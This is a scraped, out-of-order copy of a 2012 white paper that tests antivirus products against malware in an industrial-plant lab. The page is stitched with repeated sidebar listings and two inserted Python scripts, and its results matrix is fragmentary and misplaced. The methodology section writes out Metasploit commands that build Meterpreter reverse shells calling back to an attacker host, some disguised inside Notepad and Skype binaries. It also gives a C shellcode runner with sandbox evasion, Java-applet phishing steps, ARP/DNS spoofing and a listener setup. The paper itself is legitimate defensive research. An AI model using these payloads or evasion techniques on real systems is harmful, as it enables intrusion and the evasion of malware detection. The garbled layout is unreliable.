Metasploit PDF (adobe_pdf_embedded_exe_nojs) | Swrort.f | Trojan.Win32.Generic | Suspicious File | TROJ_PIDIEF.SMEO | Bloodhound.PDF.24 | Exploit.PDF-Dropper.Gen | PDF:Launchr-C | Exploit | Mal/Swrort-C | Trojan.Win32/Swrort.A | PDF/Exploit.Pidief.PFT trojan
Metasploit Java Applet | - | - | - | - | - | - | - | - | - | - | -



Note: a cell with content (shown in red in the original matrix) gives the signature name under which that antivirus solution detected the attack. A cell marked "-" indicates that the antivirus solution did not detect the attack and, consequently, that the attack succeeded.
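As an added example (not part of the original paper), the following Python script parses the detection matrix above row by row and tallies how many products each attack vector slipped past and how many attack vectors each product caught, which is the coverage view a plant security team needs when comparing products. The rows are copied from the page's matrix; the products are labelled AV1 to AV11 by column position as an assumption, since the vendor names appear only in the matrix header.

```python
"""Tally an antivirus detection matrix of the kind shown on this page.

Row format: attack vector, then one cell per antivirus product in the
matrix's column order. A cell of "-" means the product did NOT detect the
attack (so the attack succeeded); any other text is the detection name.
"""

MISS = "-"

# Constructed input: the rows of the page's matrix, one attack vector per line.
# Product names are not in these rows (they sit in the matrix header), so the
# columns are labelled AV1..AV11 by position below; that labelling is an
# assumption of this example, not the paper's notation.
MATRIX_TEXT = """\
Metasploit EXE SkypePortable Template (shikata_ga_nai) | Swrort.d | Trojan.Win32.Generic | - | - | - | Backdoor.Shell.AC | Win32:SwPatch | - | Mal/Swrort-C | Trojan.Win32/Swrort.A | a variant of Win32/Rozena.AH trojan
Metasploit LOOP-VBS Default Template (no encryption) | Swrort.f | Trojan.Win32.Generic | Script Blocked | TROJ_SWRORT.SME | Packed.Generic.347 | Backdoor.Shell.AC | Win32:SwPatch | - | Mal/Swrort-C | Trojan.Win32/Swrort.A | a variant of Win32/Rozena.AA trojan
Metasploit LOOP-VBS Default Template (shikata_ga_nai) | Swrort.f | Trojan.Win32.Generic | Script Blocked | TROJ_SWRORT.SME | Packed.Generic.347 | Backdoor.Shell.AC | Win32:SwPatch | - | Mal/Swrort-C | Trojan.Win32/Swrort.A | a variant of Win32/Rozena.AH trojan
Shellcodexec Default w/ VBS launcher | Generic.tfr!i | Trojan.Win32.Genome.vrrg | Trj/CI.A | - | Trojan.Gen | Trojan.Generic.6567028 | Win32:Malware-gen | Trojan Generic22.KPM | Mal/Generic.L | - | Win32/ShellcodeRunner.A trojan
TI Safe Modded Shellcodeexec (w/ VBS launcher) | - | - | Script Blocked | - | - | - | - | - | - | - | -
TI Safe Modded Shellcodeexec (Custom EXE w/ embedded payload) | - | - | - | - | - | Backdoor.Shell.AC | - | Trojan Generic22.SND | - | Trojan.Win32/Swrort.A | -
TI Safe Custom Payload Launcher | - | - | - | - | - | - | - | - | Mal/FakeAV-FS | - | -
Metasploit PDF (adobe_utilprintf) | Exploit.PDF.bk.gen | Exploit.JS.Pdfka.cil | - | HEUR_PDFEXP.B | Bloodhound.Exploit.213 | Exploit.PDF-JS.Gen | JS:Pdfka-gen | Script/Exploit | Troj/PDFJs-B | Trojan.Win32/Swrort.A | JS/Exploit.Pdfka.NOO trojan
Metasploit PDF (adobe_pdf_embedded_exe) | Swrort.f | Trojan.Win32.Generic | Suspicious File | TROJ_SWRORT.SME | Bloodhound.PDF.24 | Exploit.PDF-Dropper.Gen | Win32:SwPatch | Exploit.PDF | Mal/Swrort-C | Trojan.Win32/Swrort.A | PDF/Exploit.Pidief.PFW trojan
Metasploit PDF (adobe_pdf_embedded_exe_nojs) | Swrort.f | Trojan.Win32.Generic | Suspicious File | TROJ_PIDIEF.SMEO | Bloodhound.PDF.24 | Exploit.PDF-Dropper.Gen | PDF:Launchr-C | Exploit | Mal/Swrort-C | Trojan.Win32/Swrort.A | PDF/Exploit.Pidief.PFT trojan
Metasploit Java Applet | - | - | - | - | - | - | - | - | - | - | -
"""


def parse_matrix(text):
    """Return {attack_vector: [cell, ...]} in row order, rejecting ragged rows."""
    rows = {}
    width = None
    for line in text.splitlines():
        if not line.strip():
            continue
        cells = [c.strip() for c in line.split("|")]
        vector, results = cells[0], cells[1:]
        if width is None:
            width = len(results)
        if len(results) != width:
            raise ValueError(f"row {vector!r} has {len(results)} cells, expected {width}")
        rows[vector] = results
    return rows


def detections_per_vector(rows):
    """How many products raised a detection for each attack vector."""
    return {v: sum(c != MISS for c in cells) for v, cells in rows.items()}


def detections_per_product(rows):
    """How many attack vectors each product (by column position) detected."""
    width = len(next(iter(rows.values())))
    return {f"AV{i + 1}": sum(cells[i] != MISS for cells in rows.values())
            for i in range(width)}


def evaded_by_at_least(rows, min_misses):
    """Attack vectors that at least `min_misses` products failed to detect."""
    return [v for v, cells in rows.items() if cells.count(MISS) >= min_misses]


def fully_evaded(rows):
    """Attack vectors no tested product detected: every one of these succeeded."""
    width = len(next(iter(rows.values())))
    return evaded_by_at_least(rows, width)


def main():
    rows = parse_matrix(MATRIX_TEXT)
    print("Detections per attack vector:")
    for vector, n in detections_per_vector(rows).items():
        print(f"  {n:2d}/{len(rows[vector])}  {vector}")
    print("Attack vectors detected per product column:")
    for product, n in detections_per_product(rows).items():
        print(f"  {product}: {n}/{len(rows)}")
    print("Undetected by every product:", fully_evaded(rows))


if __name__ == "__main__":
    main()
```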

 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 

Recently uploaded (20)

Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 

White Paper - Are antivirus solutions enough to protect industrial plants?

1 INTRODUCTION

An increasing number of Brazilian industries are facing serious trouble related to malware infections in their automation plants, in some cases leading to loss of control, HMI freezing and the compromise of key servers on the automation network. In all cases in which we were involved, the automation networks had, at least on some servers, antivirus solutions installed and updated, and these were not able to prevent the servers from becoming infected or the infection from spreading throughout the company's automation network, causing serious problems.

Looking at these cases in the plants of Brazilian customers, our SCADA Security Division [1] decided to investigate, independently and without any influence from any manufacturer, the extent to which anti-virus solutions are effective in detecting and combating threats in automation networks.

The sections that follow detail the tests that were performed in the laboratory of TI Safe in the city of Rio de Janeiro from 25 to 27 January 2012, present the results obtained and the conclusions reached, and try to answer a simple question: how effective is an antivirus solution in protecting industrial networks?
2 METHODOLOGY APPLIED

2.1 THE TESTING VIRTUAL NETWORK

Prior to performing the tests we configured a small virtual test network, whose architecture is shown in the figure below (the figure is not reproduced in this transcript):

Machine (a) – Victim
Virtual machine with the Microsoft Windows 7 Enterprise 32-bit operating system, running on the Oracle VirtualBox 3.2.8_OSE virtualization platform. After installing the operating system, the machine received all security updates and patches through Windows Update. Adobe Reader version 8.1.2 and Java Runtime Environment version 6 update 30 were installed to serve as the infection vectors exploited in our tests. After completing the virtual machine configuration with the components listed above, we took a snapshot of the machine called 'Initial State', which is used as the starting point for all tests.

Machine (b) – Apache Web Server (fake intranet)
To simulate a virtual network with a corporate intranet, we set up an Apache web server on another virtual machine within Oracle VirtualBox 3.2.8_OSE. On the victim machine, Internet Explorer 9 has its home page configured to the URL of the Apache web server (supposedly the corporate intranet). This is a common configuration in enterprise environments, and during testing we cloned this site's original HTML and injected malware into the clone to serve as a social engineering attack vector.

Machine (c) – Attacker
An HP Pavilion DV6780se laptop running BackTrack Linux [2] version 4 with the Metasploit Framework [3] version 3 Community, fully updated. The Metasploit Framework is a framework for developing and launching exploits, frequently used in penetration testing. It consists of a series of tools, exploits and code snippets that can be used through different interfaces.
2.2 DESCRIPTION OF THE ATTACKS MADE

The samples used in the tests were in part generated by the Metasploit Framework, in part injected through web vectors, in part reused from open source code injectors, and in part coded internally by TI Safe's SCADA security team in the lab. The 16 malware samples used in the tests were the following:

1. "EICAR": EICAR [4] anti-virus test file.

2. "Metasploit EXE Default Template (no encryption)": binary file generated by the Metasploit Framework with a Meterpreter (MSF native interpreter) payload inside the default binary template, without payload encoding.
    # msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.106 LPORT=31337 R | msfencode -t exe -o sample2.exe -e generic/none

3. "Metasploit EXE Default Template (shikata_ga_nai)": binary file generated by the Metasploit Framework with a Meterpreter (MSF native interpreter) payload inside the default binary template, with shikata_ga_nai payload encoding.
    # msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.106 LPORT=31337 R | msfencode -t exe -o sample3.exe -e x86/shikata_ga_nai

4. "Metasploit EXE Notepad Template (no encryption)": binary file generated by the Metasploit Framework with a Meterpreter (MSF native interpreter) payload, using the original Notepad (notepad.exe) from a Turkish Windows 7 as template, without payload encoding.
    # msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.106 LPORT=31337 R | msfencode -t exe -o sample4.exe -e generic/none -k -x notepad_win7_turkish.exe

5. "Metasploit EXE Notepad Template (shikata_ga_nai)": binary file generated by the Metasploit Framework with a Meterpreter (MSF native interpreter) payload, using the original Notepad (notepad.exe) from a Turkish Windows 7 as template, with shikata_ga_nai payload encoding.
    # msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.106 LPORT=31337 R | msfencode -t exe -o sample5.exe -e x86/shikata_ga_nai -k -x notepad_win7_turkish.exe

6. "Metasploit EXE SkypePortable Template (shikata_ga_nai)": binary file generated by the Metasploit Framework with a Meterpreter (MSF native interpreter) payload, using Skype Portable (SkypePortable_online.paf.exe) as template, with shikata_ga_nai payload encoding.
    # msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.106 LPORT=31337 R | msfencode -t exe -o sample6.exe -e x86/shikata_ga_nai -k -x SkypePortable_online.paf.exe
7. "Metasploit LOOP-VBS Default Template (no encryption)": VBS script generated by the Metasploit Framework with Meterpreter (MSF native interpreter), without payload encoding.
    # msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.106 LPORT=31337 R | msfencode -t loop-vbs -o sample7.exe -e generic/none

8. "Metasploit LOOP-VBS Default Template (shikata_ga_nai)": VBS script generated by the Metasploit Framework with Meterpreter (MSF native interpreter), with shikata_ga_nai payload encoding.
    # msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.106 LPORT=31337 R | msfencode -t loop-vbs -o sample8.exe -e x86/shikata_ga_nai

9. "Shellcodexec Default w/ VBS launcher": ShellcodeExec [5] code injector with a VBS launcher and an alphanumeric payload generated by MSF. The ShellcodeExec code injector has no embedded payload and receives it as a command-line argument. The payload is generated through MSF:
    # msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LHOST=10.1.1.106 LPORT=31337 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
    Output: a single alphanumeric shellcode string (the encoded payload blob is omitted from this transcript).
We created a VBS script to run the binary, passing the payload as an argument:
    Set oShell = CreateObject("Wscript.shell")
    sPath = Wscript.ScriptFullName
    x = InstrRev(sPath, "\")
    sPath = Left(sPath, x)
    sCmd = sPath + "scex32.exe <alphanumeric payload omitted>"
    oShell.Run sCmd, 0, False

10. "TI Safe Modded Shellcodeexec (w/ VBS launcher)": ShellcodeExec code injector modified by TI Safe, with a VBS launcher and an alphanumeric payload generated by MSF. We took ShellcodeExec's source code, renamed all functions and variables at random (obfuscation) and changed the execution flow in order to evade the anti-virus software's heuristic signatures.

11. "TI Safe Modded Shellcodeexec (Custom EXE w/ embedded payload)": ShellcodeExec code injector modified by TI Safe, with an embedded alphanumeric payload generated by MSF. We removed the program's argument passing (argv[1]) to the injector function and read the payload from a char[] variable instead, so that the whole malware is contained in a single file.

12. "TI Safe Custom Payload Launcher": code injector created in the TI Safe laboratory, with an embedded alphanumeric payload generated by MSF and a rudimentary anti-virus sandbox evasion mechanism. We built a small C program with a call to VirtualAlloc() using the PAGE_EXECUTE_READWRITE flag:
    void* p = VirtualAlloc(NULL, PAYLOAD_SIZE, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
copied the payload into the newly reserved memory area:
    char payload[PAYLOAD_SIZE] = "<alphanumeric payload omitted>";
    char* pload_pointer = (char*) p;
    char* x = payload;
    int i;
    for (i = 0; i < PAYLOAD_SIZE; i++)
        *pload_pointer++ = *x++;
and ran it:
    (*(void (*)()) p)();
Finally, we added some functions to detect the behaviour of some sandboxes and abort the program with a clean exit (return 0), through timing analysis and function bypass verification, to reduce the number of solutions that could catch our sample by execution tracing.

13. "Metasploit PDF (adobe_utilprintf)": Meterpreter embedded in a PDF through the adobe_utilprintf exploit [6].

14. "Metasploit PDF (adobe_pdf_embedded_exe)": Meterpreter embedded in a PDF through the adobe_pdf_embedded_exe exploit [7].

15. "Metasploit PDF (adobe_pdf_embedded_exe_nojs)": Meterpreter embedded in a PDF through the adobe_pdf_embedded_exe_nojs exploit [8].

16. "Metasploit Java Applet": Meterpreter embedded in a Java applet through a web-based attack. We used SET [9] (Social-Engineer Toolkit) to clone the intranet and inject the Java applet into its source code. From the main menu we chose: 1 (Social-Engineering Attacks) → 2 (Website Attack Vectors) → 1 (Java Applet Attack Method) → 2 (Website Cloner) → 13 (ShellCodeExec Alphanum Shellcode) → Windows Meterpreter Reverse TCP.

arpspoof [10] was used to perform a MITM (man-in-the-middle) attack through ARP poisoning. dnsspoof [10] was also used to spoof the victim's DNS requests, redirecting the intranet traffic to the attacker's machine, where the malicious copy of the website is served by a lightweight Python web server.

Next, we open Internet Explorer 9 on the victim machine and wait for the intranet site to load automatically, as it is the configured start page. The browser requests name resolution for the intranet URL and receives the spoofed IP, since the connection is poisoned and the requests are spoofed. The fake web page loads and a Java prompt is presented asking whether the user wants to run a component that is indicated as issued by the company. By clicking "Run", the malware is executed.

On the attacking machine (Machine c), we load the Metasploit Framework console (msfconsole) and spawn Meterpreter's handler, configured to accept multiple sessions and to automatically run our script that migrates into the explorer.exe process, so that the session does not end when the user closes the browser. The browser on the victim machine hangs briefly and is then automatically redirected to the real website.
    # msfconsole
    msf > use multi/handler
    msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    msf exploit(multi/handler) > set LHOST 10.1.1.106
    msf exploit(multi/handler) > set LPORT 31337
    msf exploit(multi/handler) > set ExitOnSession false
    msf exploit(multi/handler) > set AutoRunScript /root/msf_scripts/migrate_to_explorer.rb
2.3 TEST METHODS

The methodology used for the tests follows the sequence of steps detailed below:

a) Setting up the victim machine with the antivirus solution to be tested: starting from the virtual machine in its 'Initial State', install and configure the antivirus solution to be tested. After installation, proceed with license registration (when available) and perform a complete update of the antivirus solution's signature database. After this we took a new snapshot of the machine, called 'Protected State'. All antivirus software tested (except the free products) was obtained from the manufacturers' websites in its evaluation version (32-bit) in English. All were installed with the 'Recommended' option. The antivirus solutions tested were the following:
• McAfee Antivirus Plus 2012
• Kaspersky Antivirus 2012
• Panda Antivirus Pro 2012
• Trend Titanium Maximum Security 2012
• Norton Antivirus 2012
• F-Secure Antivirus 2012
• avast! Pro Antivirus 6
• AVG Anti-Virus FREE 2012
• Sophos Anti-Virus 7
• Microsoft Security Essentials
• E-SET NOD32 Antivirus 5

b) Execution of the attack: the victim machine in 'Protected State' is subjected to the first attack on the list and the results are noted.

c) Restoration of the victim machine: after the attack has been tested, the victim machine's 'Protected State' snapshot is restored and the next attack is performed. This sequence is repeated until all attacks have been run against the antivirus under test. When the tests for one antivirus are finished, the same sequence is repeated for the next antivirus.
3 RESULTS

The results were compiled into a matrix (Appendix A). From the analysis of this matrix we observed that:
• The vast majority of detections were based on heuristics.
• The vast majority of antivirus solutions were not able to detect the threat in memory.
• Only two solutions reacted based on behaviour: Sophos Anti-Virus 7 and Panda Antivirus Pro 2012.
• None of the solutions that detected an attack was able to stop it.
• None of the solutions achieved the highest score.
• None of the solutions could detect more than one of the malware samples created in TI Safe's laboratory (attacks 10, 11 and 12).
• Some commercial products were not able to detect any of the malware samples created in TI Safe's laboratory (attacks 10, 11 and 12).
• In terms of heuristics, some commercial solutions underperformed the free solutions and others had equivalent performance.
• All candidates failed to prevent the attack by the Java applet (attack 16).

The detection rate by type of malware obtained in our tests was as follows:

[Figure: "Infections by malware type" and "Detections by malware type", broken down into Metasploit-generated binaries, Java Applet, Custom malware and PDF; the chart values are not reproduced in this transcript.]
[Figure: "Malware detection ratio" (0 to 100 %) and "Malware infection ratio" (0 to 30) for the categories Java Applet, PDF, Metasploit-generated binaries and Custom malware; the chart values are not reproduced in this transcript.]

In a ranking from 0 (minimum) to 16 (maximum) possible points, the final ranking of the antivirus products tested was as follows:

#   Product                                Score
1   F-Secure Antivirus 2012                13
2   Sophos Anti-Virus 7                    12
2   McAfee Antivirus Plus 2012             12
2   Kaspersky Antivirus 2012               12
2   avast! Pro Antivirus 6                 12
2   Microsoft Security Essentials          12
2   E-SET NOD32 Antivirus 5                12
3   Panda Antivirus Pro 2012               11
4   Norton Antivirus 2012                  9
4   AVG Anti-Virus FREE 2012               9
5   Trend Titanium Maximum Security 2012   8
4 DISCUSSION

Can we trust the antivirus tests we read in magazines or find on the Internet?

A quick Internet search finds hundreds of articles analysing antivirus products, many containing detailed recommendations and expert opinions based on experience, most of it with home computers. Because of this, it is difficult to rely on these tests when we need to protect a critical asset such as an automation network. Moreover, much of the analysis is biased and seeks to favour the antivirus vendors that sponsored it. Serious research should be based on a reliable methodology and have no commercial interests involved. Some international organizations, such as the non-profit AMTSO [11] (Anti-Malware Testing Standards Organization), provide test methods and extensive documentation to improve the quality, objectivity and relevance of antivirus solution analyses.

5 CONCLUSIONS

How effective is an antivirus solution at protecting automation networks?

Most anti-virus technologies are based on knowledge of attack signatures, which is fine if you are fighting common threats like Conficker or Slammer, for example. Our tests showed that when the malware is a little more sophisticated or exploits unknown Windows vulnerabilities (zero-day), antivirus solutions do little to defend the system. We are not just talking about sophisticated cyber weapons such as Stuxnet and Duqu, but about less sophisticated attacks that script kiddies can perform with the aid of attack tools downloaded from the Internet.

Our study showed that no antivirus solution is able to provide full protection for automation networks; relying on one alone leads companies to a "false sense of security", believing they are safe while the network may be infested with malware and suffering attacks ranging from industrial espionage to the takeover of their systems by external attackers.

If a security expert says that SCADA systems can be protected using only antivirus solutions, he may be committing a grave error and undermining the productivity of your company. Antivirus products are recommended, but do not provide all the security necessary in control system networks. Our recommendation for a more secure automation network is the use of compensating controls beyond the antivirus solution. These controls protect the network against attacks before they even reach the control network. Segmentation of the automation network according to the ANSI/ISA-99 standard (the zones and conduits model [12]) is very important and should be done. At the entrance to each security zone there should be security equipment such as edge firewalls and intrusion detection and prevention systems (IDPSs) configured with SCADA signatures.
A thorough review of the existing firewall rules that protect the automation network (driven by industry best practices), tight control over any device that is connected to the SCADA network (third-party laptops, removable media, modems, etc.) and deep inspection of new programs before they are installed can dramatically increase the level of security and prevent infections.

Some practices should be the rule in automation networks: do not allow the use of e-mail and web access within the automation network and, as far as possible, keep the security patches of the most critical computers up to date. All security solutions installed and configured on the automation network should send their logs to a single database managed by a good SIEM (Security Information and Event Management) solution, which will alert the security team at the slightest sign of a security incident.

In addition to prevention, companies should be prepared for the worst case and have a contingency plan in case anything goes wrong and the plant automation gets infected. It is essential to have automated backup tools installed as well as redundancy in the critical servers of the automation network. Our experience shows that the process of disinfecting a contaminated automation network is quite costly and complex, and depends on the cooperation of manufacturers to succeed, which makes the process slow. We encourage the international community to create a guide of good practices for the disinfection of an automation plant. This guide would serve as a baseline for companies experiencing this problem to regain control over their SCADA systems in a planned and preferably rapid manner.
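As an added example (not code from the paper or from TI Safe), the correlation below turns two of the findings above into SIEM-style rules over constructed antivirus and firewall log lines: a detection on an automation host that is followed by an outbound connection outside the zone's conduits is escalated, because, as the tests showed, a detection alone does not mean the payload was stopped, and any other unapproved outbound connection from the automation zone is an alert on its own. Host names, log formats and the allowlist are assumptions; the handler address 10.1.1.106:31337 is the one used in the tests.

```python
"""SIEM-style correlation of antivirus and firewall logs for an automation zone.

Added example, not code from the paper or from TI Safe. Host names, the log
line formats and the conduit allowlist below are constructed assumptions.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed: hosts in the automation zone and the only (dst, port) pairs
# they may reach, i.e. the conduits defined for the zone.
AUTOMATION_HOSTS = {"hmi-01", "hist-01", "eng-ws-02"}
ALLOWED_CONDUITS = {
    ("10.20.0.5", 502),    # PLC, Modbus/TCP
    ("10.20.0.10", 1433),  # historian database
    ("10.20.0.20", 8530),  # patch server
}
# A detection is treated as "payload still running" if the same host makes an
# unapproved outbound connection within this window afterwards.
DETECT_WINDOW = timedelta(minutes=5)

# Constructed formats: "<iso-time> <host> av: <detected|blocked> <signature>"
# and "<iso-time> <host> fw: outbound tcp <dst-ip>:<port>".
AV_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) av: (?P<action>detected|blocked) (?P<sig>\S+)$")
FW_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) fw: outbound tcp (?P<dst>[\d.]+):(?P<port>\d+)$")

@dataclass(frozen=True)
class AvEvent:
    ts: datetime
    host: str
    action: str     # "detected" (seen, not stopped) or "blocked"
    signature: str

@dataclass(frozen=True)
class FlowEvent:
    ts: datetime
    host: str
    dst: str
    port: int

@dataclass(frozen=True)
class Alert:
    severity: str   # "critical", "high" or "medium"
    host: str
    reason: str

def parse_line(line):
    """Return an AvEvent or FlowEvent, or None for a line in neither format."""
    m = AV_RE.match(line)
    if m:
        return AvEvent(datetime.fromisoformat(m["ts"]), m["host"], m["action"], m["sig"])
    m = FW_RE.match(line)
    if m:
        return FlowEvent(datetime.fromisoformat(m["ts"]), m["host"], m["dst"], int(m["port"]))
    return None

def correlate(lines):
    """Run the rules over raw log lines and return the alerts in time order."""
    events = [e for e in map(parse_line, lines) if e is not None]
    events.sort(key=lambda e: e.ts)
    alerts = []
    open_detections = {}  # host -> last detection the antivirus did not report as blocked
    for ev in events:
        if isinstance(ev, AvEvent):
            if ev.host in AUTOMATION_HOSTS:
                alerts.append(Alert("medium", ev.host,
                                    f"antivirus {ev.action} {ev.signature} inside the automation zone"))
            if ev.action == "detected":
                open_detections[ev.host] = ev
            else:
                open_detections.pop(ev.host, None)
            continue
        # FlowEvent: only automation hosts and non-conduit destinations are in scope.
        if ev.host not in AUTOMATION_HOSTS or (ev.dst, ev.port) in ALLOWED_CONDUITS:
            continue
        det = open_detections.get(ev.host)
        if det is not None and ev.ts - det.ts <= DETECT_WINDOW:
            alerts.append(Alert("critical", ev.host,
                                f"{det.signature} was detected but the host then connected "
                                f"outbound to {ev.dst}:{ev.port}; treat as a running payload"))
        else:
            alerts.append(Alert("high", ev.host,
                                f"outbound {ev.dst}:{ev.port} is outside the zone's conduits"))
    return alerts

# Constructed sample logs; 10.1.1.106:31337 is the reverse_tcp handler address
# used in the paper's tests, everything else is made up for the example.
SAMPLE_LOGS = [
    "2012-01-26T10:00:00 hist-01 fw: outbound tcp 10.20.0.10:1433",
    "2012-01-26T10:01:10 hmi-01 av: detected Trojan.Win32/Swrort.A",
    "2012-01-26T10:01:12 hmi-01 fw: outbound tcp 10.1.1.106:31337",
    "2012-01-26T10:05:00 eng-ws-02 av: blocked Exploit.PDF-JS.Gen",
    "2012-01-26T10:05:03 eng-ws-02 fw: outbound tcp 10.20.0.20:8530",
    "2012-01-26T10:30:00 hist-01 fw: outbound tcp 203.0.113.9:80",
    "2012-01-26T10:31:00 office-pc-7 fw: outbound tcp 203.0.113.9:80",
]

if __name__ == "__main__":
    for a in correlate(SAMPLE_LOGS):
        print(f"[{a.severity.upper():8}] {a.host}: {a.reason}")
```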
REFERENCES ON THE INTERNET

[1] http://www.tisafe.com/solucoes/seguranca-scada/
[2] http://www.backtrack-linux.org/
[3] http://www.metasploit.com/
[4] http://www.eicar.org/86-0-Intended-use.html
[5] https://github.com/inquisb/shellcodeexec
[6] http://www.metasploit.com/modules/exploit/windows/browser/adobe_utilprintf
[7] http://www.metasploit.com/modules/exploit/windows/fileformat/adobe_pdf_embedded_exe
[8] http://www.metasploit.com/modules/exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
[9] http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engineer_Toolkit_(SET)
[10] http://monkey.org/~dugsong/dsniff/
[11] http://www.amtso.org
[12] http://www.slideshare.net/tisafe/apresentao-tcnica-segurana-scada-realizada-no-isa-show-2011
APPENDIX A – MATRIX OF TEST RESULTS

Column legend: McAfee = McAfee Antivirus Plus 2012; Kaspersky = Kaspersky Antivirus 2012; Panda = Panda Antivirus Pro 2012; Trend = Trend Titanium Maximum Security 2012; Norton = Norton Antivirus 2012; F-Secure = F-Secure Antivirus 2012; avast! = avast! Pro Antivirus 6; AVG = AVG Anti-Virus FREE 2012; Sophos = Sophos Anti-Virus 7; MSE = Microsoft Security Essentials; ESET = E-SET NOD32 Antivirus 5.

Sample | McAfee | Kaspersky | Panda | Trend | Norton | F-Secure | avast! | AVG | Sophos | MSE | ESET
